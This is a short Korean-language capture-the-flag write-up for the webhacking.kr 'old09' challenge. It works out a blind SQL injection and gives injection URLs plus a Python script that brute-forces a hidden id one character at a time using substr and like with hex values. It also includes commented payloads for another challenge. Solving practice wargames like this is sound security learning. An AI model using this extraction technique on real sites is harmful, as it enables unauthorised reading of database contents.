webhacking.kr - old09

처음 접속하면 위와 같이 나온다.

1은 애플

2는 바나나

3은

무언가 힌트를 준다.

3을 활용해서 sqli를 시도하면 될 듯하다.

소스코드를 확인하고 결과를 확인할 수 없는 bsqli 같은데, 필터링들이 다수 존재한다.

> webhacking.kr/challenge/web-09/?no=if(length(id)like(11),3,0)

[

Challenge 9

webhacking.kr

](https://webhacking.kr/challenge/web-09/?no=if(length(id)like(11),3,0))

위와 같은 구문으로 11자리라는 것을 구할 수 있고,

똑같이 id의 각 자리를 찾아주면 된다.

페이로드는 아래와 같다.

import requests

result = ""
string = "abcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()-=+[]{};:'\"<>,.?/ABCDEFGHIJKLMNOPQRSTUVWXYZ"
#24letter
for i in range(1, 12) :
    for j in string :
        URL = "https://webhacking.kr/challenge/web-09/?no=if(substr(id,"+str(i)+",1)like("+str(hex(ord(j)))+"),3,0)"
        response=requests.get(URL)
        print(URL)
        if "Secret" in response.text :
            print("["+str(i)+"th] password is = " + str(j))
            result += str(chr(ord(j)))
            print(result)
            break;

print(result)

#0||id=0x61646d696e&&length(pw)>0

#https://webhacking.kr/challenge/web-29/?no=0||substr(pw,1,1)=0x6c&id=guest&pw=guest